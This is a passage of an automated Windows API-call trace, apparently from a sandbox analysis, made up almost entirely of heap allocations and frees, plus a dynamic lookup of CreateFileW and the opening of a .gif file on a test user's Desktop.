RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca970 [0124.274] CharLowerBuffW (in: lpsz="handle", cchLength=0x6 | out: lpsz="handle") returned 0x6 [0124.274] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca9b8 [0124.274] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2640 [0124.274] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e25a0 [0124.274] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca7a8 [0124.274] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca9b8 | out: hHeap=0x1780000) returned 1 [0124.274] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2640 | out: hHeap=0x1780000) returned 1 [0124.274] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca7a8 | out: hHeap=0x1780000) returned 1 [0124.274] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25a0 | out: hHeap=0x1780000) returned 1 [0124.274] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfa68 [0124.274] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2560 [0124.274] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca940 [0124.274] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e26d0 [0124.274] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e25d0 [0124.274] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca9b8 [0124.274] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca940 | out: hHeap=0x1780000) returned 1 [0124.274] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26d0 | out: hHeap=0x1780000) returned 1 [0124.274] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca9b8 | out: hHeap=0x1780000) returned 1 [0124.274] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25d0 | out: hHeap=0x1780000) returned 1 [0124.274] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2640 [0124.274] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca7a8 [0124.274] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e25d0 [0124.274] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e26d0 [0124.274] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca868 [0124.274] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca7a8 | out: hHeap=0x1780000) returned 1 [0124.274] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25d0 | out: hHeap=0x1780000) returned 1 [0124.274] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca868 | out: hHeap=0x1780000) returned 1 [0124.275] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26d0 | out: hHeap=0x1780000) returned 1 [0124.275] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2670 [0124.275] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caa00 [0124.275] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e26d0 [0124.275] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2590 [0124.275] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca898 [0124.275] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caa00 | out: hHeap=0x1780000) returned 1 [0124.275] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26d0 | out: hHeap=0x1780000) returned 1 [0124.275] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca898 | out: hHeap=0x1780000) returned 1 [0124.275] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2590 | out: hHeap=0x1780000) returned 1 [0124.275] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e25f0 [0124.275] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca7c0 [0124.275] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2610 [0124.275] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2690 [0124.275] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca850 [0124.275] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca7c0 | out: hHeap=0x1780000) returned 1 [0124.275] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2610 | out: hHeap=0x1780000) returned 1 [0124.275] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca850 | out: hHeap=0x1780000) returned 1 [0124.275] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2690 | out: hHeap=0x1780000) returned 1 [0124.275] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2690 [0124.275] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca898 [0124.275] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e25c0 [0124.275] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e26d0 [0124.275] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca8f8 [0124.275] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca898 | out: hHeap=0x1780000) returned 1 [0124.275] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25c0 | out: hHeap=0x1780000) returned 1 [0124.275] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca8f8 | out: hHeap=0x1780000) returned 1 [0124.275] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26d0 | out: hHeap=0x1780000) returned 1 [0124.275] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e26a0 [0124.276] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caa48 [0124.276] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e26d0 [0124.276] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e26e0 [0124.276] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca8c8 [0124.276] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caa48 | out: hHeap=0x1780000) returned 1 [0124.276] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26d0 | out: hHeap=0x1780000) returned 1 [0124.276] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca8c8 | out: hHeap=0x1780000) returned 1 [0124.276] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26e0 | out: hHeap=0x1780000) returned 1 [0124.276] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2580 [0124.276] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca7f0 [0124.276] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2590 [0124.276] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e26d0 [0124.276] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caa60 [0124.276] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca7f0 | out: hHeap=0x1780000) returned 1 [0124.276] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2590 | out: hHeap=0x1780000) returned 1 [0124.276] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caa60 | out: hHeap=0x1780000) returned 1 [0124.276] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26d0 | out: hHeap=0x1780000) returned 1 [0124.276] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x772d0000 [0124.276] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca838 [0124.276] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e26d0 [0124.276] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CreateFileW", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0124.276] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43ca8c8 [0124.276] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CreateFileW", cchWideChar=12, lpMultiByteStr=0x43ca8c8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CreateFileW", lpUsedDefaultChar=0x0) returned 12 [0124.277] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca8c8 | out: hHeap=0x1780000) returned 1 [0124.277] GetProcAddress (hModule=0x772d0000, lpProcName="CreateFileW") returned 0x7733ed10 [0124.277] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca838 | out: hHeap=0x1780000) returned 1 [0124.277] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26d0 | out: hHeap=0x1780000) returned 1 [0124.277] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf8b0 [0124.277] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e25d0 [0124.277] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e26d0 [0124.277] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2610 [0124.277] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e26e0 [0124.277] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2590 [0124.277] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e26f0 [0124.277] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2700 [0124.277] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20002) returned 0x499a008 [0124.277] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25d0 | out: hHeap=0x1780000) returned 1 [0124.277] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26d0 | out: hHeap=0x1780000) returned 1 [0124.277] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2610 | out: hHeap=0x1780000) returned 1 [0124.277] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26e0 | out: hHeap=0x1780000) returned 1 [0124.277] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2590 | out: hHeap=0x1780000) returned 1 [0124.277] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26f0 | out: hHeap=0x1780000) returned 1 [0124.277] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2700 | out: hHeap=0x1780000) returned 1 [0124.277] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf8b0 | out: hHeap=0x1780000) returned 1 [0124.277] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Desktop\\MDF9dFhi.gif" (normalized: "c:\\users\\fd1hvy\\desktop\\mdf9dfhi.gif"), dwDesiredAccess=0x80000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x258 [0124.278] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2590 [0124.278] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x214) returned 0x43ea040 [0124.278] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf978 [0124.278] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca9e8 [0124.278] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca820 [0124.278] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca898 [0124.278] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e25d0 [0124.278] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca898 | out: hHeap=0x1780000) returned 1 [0124.278] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25d0 | out: hHeap=0x1780000) returned 1 [0124.278] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca820 | out: hHeap=0x1780000) returned 1 [0124.278] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca8c8 [0124.278] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca940 [0124.278] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca7a8 [0124.278] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2710 [0124.278] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca7a8 | out: hHeap=0x1780000) returned 1 [0124.278] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x50) returned 0x436a2f0 [0124.278] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x499a008 | out: hHeap=0x1780000) returned 1 [0124.278] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caa18 [0124.278] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caa48 [0124.278] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca988 [0124.278] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e26d0 [0124.278] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca988 | out: hHeap=0x1780000) returned 1 [0124.278] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26d0 | out: hHeap=0x1780000) returned 1 [0124.278] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caa48 | out: hHeap=0x1780000) returned 1 [0124.278] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca838 [0124.278] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca820 [0124.279] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca898 [0124.279] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e26d0 [0124.279] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca898 | out: hHeap=0x1780000) returned 1 [0124.279] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26d0 | out: hHeap=0x1780000) returned 1 [0124.279] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca820 | out: hHeap=0x1780000) returned 1 [0124.279] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca988 [0124.279] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca898 [0124.279] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca868 [0124.279] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e26d0 [0124.279] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca868 | out: hHeap=0x1780000) returned 1 [0124.279] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26d0 | out: hHeap=0x1780000) returned 1 [0124.279] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca898 | out: hHeap=0x1780000) returned 1 [0124.279] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caa78 [0124.279] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca8e0 [0124.279] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca790 [0124.279] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e25a0 [0124.279] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca790 | out: hHeap=0x1780000) returned 1 [0124.279] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25a0 | out: hHeap=0x1780000) returned 1 [0124.279] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca8e0 | out: hHeap=0x1780000) returned 1 [0124.279] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca808 [0124.279] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca9b8 [0124.279] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca7f0 [0124.279] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e26d0 [0124.279] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca7f0 | out: hHeap=0x1780000) returned 1 [0124.279] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26d0 | out: hHeap=0x1780000) returned 1 [0124.279] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca9b8 | out: hHeap=0x1780000) returned 1 [0124.280] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caa30 | out: hHeap=0x1780000) returned 1 [0124.280] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25a0 | out: hHeap=0x1780000) returned 1 [0124.280] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caa00 | out: hHeap=0x1780000) returned 1 [0124.280] FreeLibrary (hLibModule=0x772d0000) returned 1 [0124.280] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2560 | out: hHeap=0x1780000) returned 1 [0124.280] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2640 | out: hHeap=0x1780000) returned 1 [0124.280] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2670 | out: hHeap=0x1780000) returned 1 [0124.280] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25f0 | out: hHeap=0x1780000) returned 1 [0124.280] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2690 | out: hHeap=0x1780000) returned 1 [0124.280] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26a0 | out: hHeap=0x1780000) returned 1 [0124.280] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2580 | out: hHeap=0x1780000) returned 1 [0124.280] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfa68 | out: hHeap=0x1780000) returned 1 [0124.280] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca970 | out: hHeap=0x1780000) returned 1 [0124.280] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26c0 | out: hHeap=0x1780000) returned 1 [0124.280] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca598 | out: hHeap=0x1780000) returned 1 [0124.280] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca658 | out: hHeap=0x1780000) returned 1 [0124.280] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca538 | out: hHeap=0x1780000) returned 1 [0124.280] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca760 | out: hHeap=0x1780000) returned 1 [0124.280] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca550 | out: hHeap=0x1780000) returned 1 [0124.280] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca6b8 | out: hHeap=0x1780000) returned 1 [0124.280] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca4a8 | out: hHeap=0x1780000) returned 1 [0124.280] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca4c0 | out: hHeap=0x1780000) returned 1 [0124.280] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca6d0 | out: hHeap=0x1780000) returned 1 [0124.280] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca5b0 | out: hHeap=0x1780000) returned 1 [0124.280] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca490 | out: hHeap=0x1780000) returned 1 [0124.280] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca778 | out: hHeap=0x1780000) returned 1 [0124.280] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca4d8 | out: hHeap=0x1780000) returned 1 [0124.280] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca688 | out: hHeap=0x1780000) returned 1 [0124.280] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca670 | out: hHeap=0x1780000) returned 1 [0124.281] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca4f0 | out: hHeap=0x1780000) returned 1 [0124.281] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca6e8 | out: hHeap=0x1780000) returned 1 [0124.281] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca6a0 | out: hHeap=0x1780000) returned 1 [0124.281] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca700 | out: hHeap=0x1780000) returned 1 [0124.281] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca880 | out: hHeap=0x1780000) returned 1 [0124.282] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca718 | out: hHeap=0x1780000) returned 1 [0124.282] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca958 | out: hHeap=0x1780000) returned 1 [0124.282] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca7d8 | out: hHeap=0x1780000) returned 1 [0124.282] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca8b0 | out: hHeap=0x1780000) returned 1 [0124.282] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca9d0 | out: hHeap=0x1780000) returned 1 [0124.282] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca9a0 | out: hHeap=0x1780000) returned 1 [0124.282] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca910 | out: hHeap=0x1780000) returned 1 [0124.282] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca928 | out: hHeap=0x1780000) returned 1 [0124.282] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x41a5250 | out: hHeap=0x1780000) returned 1 [0124.282] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2570 | out: hHeap=0x1780000) returned 1 [0124.282] PeekMessageW (in: lpMsg=0x144ebfc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144ebfc) returned 0 [0124.282] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ea268 | out: hHeap=0x1780000) returned 1 [0124.282] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25b0 | out: hHeap=0x1780000) returned 1 [0124.282] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25a0 | out: hHeap=0x1780000) returned 1 [0124.282] PeekMessageW (in: lpMsg=0x144ebfc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144ebfc) returned 0 [0124.283] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2610 | out: hHeap=0x1780000) returned 1 [0124.283] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25a0 | out: hHeap=0x1780000) returned 1 [0124.283] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2720 | out: hHeap=0x1780000) returned 1 [0124.283] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca850 | out: hHeap=0x1780000) returned 1 [0124.283] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf950 | out: hHeap=0x1780000) returned 1 [0124.283] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796f48 | out: hHeap=0x1780000) returned 1 [0124.283] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2640 | out: hHeap=0x1780000) returned 1 [0124.283] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25f0 | out: hHeap=0x1780000) returned 1 [0124.283] PeekMessageW (in: lpMsg=0x144ebfc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144ebfc) returned 0 [0124.283] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2580 | out: hHeap=0x1780000) returned 1 [0124.283] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2610 | out: hHeap=0x1780000) returned 1 [0124.283] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a8cc0 | out: hHeap=0x1780000) returned 1 [0124.283] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9d10 | out: hHeap=0x1780000) returned 1 [0124.283] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9d40 | out: hHeap=0x1780000) returned 1 [0124.283] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2160 | out: hHeap=0x1780000) returned 1 [0124.283] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfba8 | out: hHeap=0x1780000) returned 1 [0124.283] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca730 | out: hHeap=0x1780000) returned 1 [0124.283] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfa18 | out: hHeap=0x1780000) returned 1 [0124.283] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2540 | out: hHeap=0x1780000) returned 1 [0124.283] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfb30 | out: hHeap=0x1780000) returned 1 [0124.283] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9c20 | out: hHeap=0x1780000) returned 1 [0124.283] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9b90 | out: hHeap=0x1780000) returned 1 [0124.283] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf4a0 | out: hHeap=0x1780000) returned 1 [0124.283] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2180 | out: hHeap=0x1780000) returned 1 [0124.283] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf450 | out: hHeap=0x1780000) returned 1 [0124.283] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9c38 | out: hHeap=0x1780000) returned 1 [0124.283] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9dd0 | out: hHeap=0x1780000) returned 1 [0124.283] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2240 | out: hHeap=0x1780000) returned 1 [0124.283] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf860 | out: hHeap=0x1780000) returned 1 [0124.283] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9d58 | out: hHeap=0x1780000) returned 1 [0124.283] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4392260 | out: hHeap=0x1780000) returned 1 [0124.284] HeapFree (in: 